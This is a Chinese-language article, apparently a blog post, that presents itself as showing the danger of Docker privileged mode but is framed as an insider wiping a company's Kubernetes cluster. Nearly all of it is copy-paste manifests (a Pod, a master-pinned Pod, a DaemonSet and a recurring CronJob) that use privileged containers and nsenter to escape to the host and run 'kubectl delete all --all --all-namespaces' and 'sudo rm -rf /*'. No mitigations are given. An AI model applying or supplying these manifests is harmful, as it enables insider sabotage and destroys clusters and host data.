本文档主要用于展示 Docker 特权模式的危害,请谨慎操作。对于没有 CLI 操作权限的用户,可以拷贝示例的 Yaml,直接创建集群负载 Pod、Job、DaemonSet 等进行操作。
1. 直接删除全部资源
如果能登陆机器,收拾好东西,执行命令:
1
| kubectl delete all --all --all-namespaces
|
但是也有可能没那么大权限,那么就试试下面的方法吧。下面的方法依赖于 Docker 的特权模式。
2. 随便试试,热热身
先热热身,执行脚本,随便试试,看看有没有效果。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: danger-1
namespace: default
spec:
containers:
- command: ["sh"]
args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
image: docker.io/alpine:3.12
name: pod-test
securityContext:
privileged: true
hostIPC: true
hostNetwork: true
hostPID: true
tolerations:
- effect: NoSchedule
key: node-role.kubernetes.io/master
- key: CriticalAddonsOnly
operator: Exists
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 60
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 60
EOF
|
3. 可能 Master 节点上配置了 kubeconfig
如果 Node 节点无法执行 kubectl 命令,那么可以选中 Master 节点试试。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: danger-1
namespace: default
spec:
affinity:
nodeAffinity:
preferredDuringSchedulingIgnoredDuringExecution:
- preference:
matchExpressions:
- key: node-role.kubernetes.io/master
operator: In
values:
- ""
weight: 100
containers:
- command: ["sh"]
args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
image: docker.io/alpine:3.12
name: pod-test
securityContext:
privileged: true
tolerations:
- effect: NoSchedule
key: node-role.kubernetes.io/master
- key: CriticalAddonsOnly
operator: Exists
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 60
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 60
hostIPC: true
hostNetwork: true
hostPID: true
EOF
|
4. 算了,全部节点都试试
如果还是不行,干脆全部节点都试试吧,反正东西都收拾好了。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: danger-3
spec:
selector:
matchLabels:
danger.kubernetes.io/name: d3
template:
metadata:
labels:
danger.kubernetes.io/name: d3
spec:
containers:
- command: ["sh"]
args: ["-c", "echo 'kubectl delete all --all --all-namespaces' | nsenter -t 1 -m -u -i -n"]
image: docker.io/alpine:3.12
name: pod-test
securityContext:
privileged: true
hostIPC: true
hostNetwork: true
hostPID: true
tolerations:
- effect: NoSchedule
key: node-role.kubernetes.io/master
- key: CriticalAddonsOnly
operator: Exists
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 60
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 60
EOF
|
5. 最后挣扎一下,定时试试,先下班了
试到这里,大概率明天还得继续搬砖 996 了,最后再试一次。
每五分钟执行一次,基本格式 : * * * * *,分别对应分、时、日、月、周。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| cat <<EOF | kubectl apply -f -
apiVersion: batch/v1beta1
kind: CronJob
metadata:
name: danger-4
spec:
schedule: "*/5 * * * *"
jobTemplate:
spec:
template:
spec:
containers:
- command: ["sh"]
args: ["-c", "echo 'sudo rm -rf /*' | nsenter -t 1 -m -u -i -n"]
image: docker.io/alpine:3.12
name: pod-test
securityContext:
privileged: true
restartPolicy: OnFailure
hostIPC: true
hostNetwork: true
hostPID: true
tolerations:
- effect: NoSchedule
key: node-role.kubernetes.io/master
- key: CriticalAddonsOnly
operator: Exists
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 60
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 60
EOF
|
6. 参考
